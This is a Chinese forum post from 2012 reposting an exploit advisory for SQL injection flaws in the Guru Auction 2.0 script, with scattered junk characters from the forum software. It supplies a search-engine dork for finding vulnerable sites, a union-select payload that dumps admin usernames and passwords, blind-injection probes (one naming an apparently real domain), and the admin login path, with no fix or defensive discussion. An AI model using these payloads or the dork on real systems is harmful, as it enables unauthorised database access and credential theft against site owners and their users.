找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2087|回复: 0
打印 上一主题 下一主题

Guru Auction 2.0多重sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:24:05 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities4 o' m$ }( V0 x1 B; b* Q! d" X- L% K' g
5 s. o# g( Z+ F2 [' z  L- t
作者     : v3n0m. K& ~5 i; J8 s# o: E$ E
应用 : Guru Auction 2.0
* U5 v/ k" r5 C4 v+ ~& z( mPrice       : $49! G1 K$ f  H6 `
Vendor      : http://www.guruscript.com/" H: a8 m1 S2 s7 s# E5 i* G2 D
Google Dork : inurl:subcat.php?cate_id=
8 k/ |9 h- k) B3 J/ v5 ?, f1 V- A; X + O3 Q* V2 {3 X# `
SQLi p0c:
) M: y1 j) W, X# S7 ]( O) y~~~~~~~~~~
; a* s9 @) }# @$ m6 Ahttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
9 t9 n5 v/ D: |; b$ B$ h3 R/ V
$ {* J8 o9 x) L6 g( }& X/ s
# {, u& d" J. x" w0 T. e# O1 s) G- U% }盲注 p0c:
  l) U5 U2 p, Q~~~~~~~~~~
, i3 R0 b0 K8 C) R$ y: shttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true" G3 F. V! J, ~$ k$ G0 P6 x
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
9 C6 _7 w0 a: I. a' ^4 G 4 b6 `( I8 S$ p5 \6 N) t; \
管理登录入口:0 V( Y5 l& Q7 U0 u; d6 @
~~~~~~~~~~
: k& @% U2 M/ J5 r7 w2 Hhttp://domain.tld/[path]/admin/5 |: S0 I' k; @' N& k. S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表